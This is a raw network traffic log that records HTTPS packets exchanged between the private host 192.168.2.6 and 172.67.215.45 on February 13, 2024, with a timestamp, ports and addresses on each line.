Feb 13, 2024 21:13:54.752301931 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.752301931 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.753768921 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.753787041 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.753848076 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.753848076 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.753854036 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.753901958 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.755239010 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.755259037 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.755316019 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.755316019 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.755321980 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.755388975 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.757410049 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.757438898 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.757482052 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.757491112 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.757522106 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.757522106 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.759349108 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.759370089 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.759404898 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.759423018 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.759443998 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.759474993 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.761584044 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.761607885 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.761663914 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.761663914 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.761672020 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.761733055 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.763637066 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.763662100 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.763693094 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.763714075 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.763725042 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.763748884 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.765944004 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.765969038 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.766030073 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.766030073 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.766038895 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.766082048 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.768074036 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.768098116 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.768126011 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.768140078 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.768157959 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.768177032 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.770133018 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.770154953 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.770215034 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.770215034 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.770220995 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.770287037 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.772469044 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.772492886 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.772550106 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.772550106 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.772556067 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.772588015 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.774219036 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.774243116 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.774292946 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.774308920 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.774350882 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.774350882 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.776206017 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.776228905 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.776289940 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.776289940 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.776302099 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.776338100 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.778251886 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.778274059 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.778331995 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.778342962 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.778367996 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.778409958 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.780119896 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.780139923 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.780195951 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.780208111 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.780246019 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.781941891 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.781965971 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.781999111 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.782017946 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.782048941 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.782048941 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.783421040 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.783436060 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.783495903 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.783507109 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.783577919 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.785007954 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.785022974 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.785068035 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.785089016 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.785245895 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.786739111 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.786753893 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.786828041 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.786839962 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.786936998 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.788117886 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.788132906 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.788176060 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.788192034 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.788227081 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.789679050 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.789699078 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.789905071 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.789912939 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.790045977 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.791244984 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.791261911 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.791306019 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.791316032 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.791362047 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.792857885 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.792872906 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.792936087 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.792936087 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.792943001 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.792975903 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.794527054 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.794543028 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.794584036 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.794598103 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.794644117 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.796241045 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.796257019 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.796304941 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.796319008 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.796735048 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.797581911 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.797619104 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.797661066 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.797677040 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.797837019 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.799218893 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.799235106 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.799297094 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.799297094 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.799304962 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.799515009 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.800827026 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.800842047 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.800889015 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.800904036 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.801040888 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.802961111 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.802975893 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.803023100 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.803030014 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.803133011 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.804240942 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.804256916 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.804303885 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.804315090 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.804373980 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.805280924 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.805294991 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.805352926 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.805361032 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.805404902 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.807019949 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.807034969 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.807176113 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.807184935 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.807337999 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.808607101 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.808621883 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.808758974 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.808765888 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.808846951 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.810471058 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.810486078 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.810561895 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.810569048 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.810611963 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.811770916 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.811784983 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.811841965 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.811850071 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.811894894 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.813257933 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.813271046 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.813374043 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.813380957 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.813421965 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.814980030 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.814992905 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.815093040 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.815100908 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.815275908 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.816770077 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.816782951 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.816831112 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.816839933 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.816869974 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.816869974 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.817951918 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.817965984 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.818006992 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.818022013 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.818052053 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.818052053 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.819694042 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.819709063 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.819762945 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.819777012 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.819890976 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.821249962 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.821264982 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.821355104 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.821355104 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.821362972 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.821468115 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.822855949 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.822880983 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.822963953 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.822963953 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.822972059 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.823009014 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.825007915 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.825021029 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.825062037 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.825077057 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.825480938 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.825984001 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.825999975 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.826040983 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.826056004 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.826240063 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.844893932 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.844928026 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.845015049 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.845015049 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.845029116 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.845185041 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.846121073 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.846136093 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.846196890 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.846196890 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.846204042 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.846705914 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.847841024 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.847855091 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.847908974 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.847908974 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.847918034 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.847958088 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.849446058 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.849467039 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.849498034 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.849518061 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.849546909 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.849546909 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.850657940 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.850678921 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.850728989 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.850728989 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.850735903 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.850822926 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.852900028 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.852912903 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.852969885 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.852969885 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.852977991 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.853118896 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.853771925 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.853790998 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.853907108 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.853914976 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.853959084 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.855463028 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.855478048 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.855541945 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.855541945 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.855550051 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.856273890 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.857175112 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.857194901 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.857248068 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.857254982 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.857290983 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.857290983 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.858182907 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.858198881 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.858262062 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.858262062 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.858269930 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.859354019 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.859405041 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.859419107 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.859479904 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.859479904 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.859487057 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.860378981 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.861676931 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.861697912 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.861905098 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.861921072 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.862193108 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.862946987 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.862963915 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.863233089 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.863240957 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.863440990 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.864141941 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.864161015 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.864218950 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.864234924 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.864386082 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.867199898 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.867214918 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.867283106 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.867283106 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.867290974 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.867335081 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.867355108 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.867372036 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.867372036 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.867378950 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.867419958 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.867419958 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.867872000 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.867886066 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.867930889 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.867930889 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.867937088 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.867990971 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.868271112 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.868283987 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.868338108 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.868338108 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.868345022 CET	443	49701	172.67.215.45	192.168.2.6
